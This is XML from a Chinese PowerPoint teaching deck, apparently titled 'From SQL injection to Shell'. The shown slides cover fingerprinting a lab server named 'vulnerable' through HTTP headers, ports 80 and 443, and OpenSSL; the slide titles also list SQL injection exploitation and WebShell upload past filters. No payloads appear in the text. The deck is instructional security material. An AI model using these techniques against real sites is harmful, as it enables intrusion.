          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3058053" y="4402398"/>
            <a:ext cx="4531057" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主机名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>或服务器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="直接箭头连接符 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3734631" y="3936960"/>
            <a:ext cx="86742" cy="506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544705" y="5390630"/>
            <a:ext cx="5854889" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用程序使用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的默认值）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="直接箭头连接符 15"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4793122" y="3958428"/>
            <a:ext cx="2" cy="1425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77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a:xfrm>
            <a:off x="1050253" y="1722555"/>
            <a:ext cx="10363826" cy="3424107"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>请求：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>会检索到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>版本的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>信息：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3506835" y="1722555"/>
            <a:ext cx="2226077" cy="747690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4811688" y="2823433"/>
            <a:ext cx="3858563" cy="1970041"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="标题 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="872832" y="335408"/>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sz="4800" dirty="0" smtClean="0"/>
              <a:t>指纹收集 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>头</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="326197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sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2157155"/>
            <a:ext cx="10363826" cy="3424107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这里的应用程序只能通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如果应用程序只能通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>就无法与服务器通信，可以使用工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>OpenSSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1256874" y="3090295"/>
            <a:ext cx="4611663" cy="455292"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4190817" y="3957446"/>
            <a:ext cx="4531057" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主机名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>或服务器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="直接箭头连接符 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4722125" y="3425589"/>
            <a:ext cx="0" cy="600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164827" y="4755147"/>
            <a:ext cx="6303842" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>443 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用程序使用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>443</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>默认值）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="直接箭头连接符 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5404513" y="3545587"/>
            <a:ext cx="13648" cy="120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标题 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913775" y="51615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sz="4800" dirty="0" smtClean="0"/>
              <a:t>指纹收集 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>头</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="417932679"/>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871</TotalTime>
  <Words>1407</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>180</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宋体</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>水滴</vt:lpstr>
      <vt:lpstr>From SQL injection to Shell </vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>Sql injection 产生原因</vt:lpstr>
      <vt:lpstr>SQL注入 分类</vt:lpstr>
      <vt:lpstr>SQL注入 危害</vt:lpstr>
      <vt:lpstr>实验举例</vt:lpstr>
      <vt:lpstr>指纹收集 -检查HTTP头</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>SQL注入和利用</vt:lpstr>
      <vt:lpstr>SQL注入和利用</vt:lpstr>
      <vt:lpstr>SQL注入和利用</vt:lpstr>
      <vt:lpstr>SQL注入和利用</vt:lpstr>
      <vt:lpstr>SQL注入和利用</vt:lpstr>
      <vt:lpstr>SQL注入和利用</vt:lpstr>
      <vt:lpstr>SQL注入和利用</vt:lpstr>
      <vt:lpstr>SQL注入和利用</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>绕过过滤上传WebShell </vt:lpstr>
      <vt:lpstr>绕过过滤上传WebShell </vt:lpstr>
      <vt:lpstr>防御措施</vt:lpstr>
      <vt:lpstr>拓展实验——SQL盲注</vt:lpstr>
      <vt:lpstr>拓展实验——SQL盲注</vt:lpstr>
      <vt:lpstr>参考资料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zys</dc:creator>
  <cp:lastModifiedBy>chang zhao</cp:lastModifiedBy>
  <cp:revision>107</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-10-16T05:19:49Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-10-30T06:51:09Z</dcterms:modified>
</cp:coreProperties>
</file>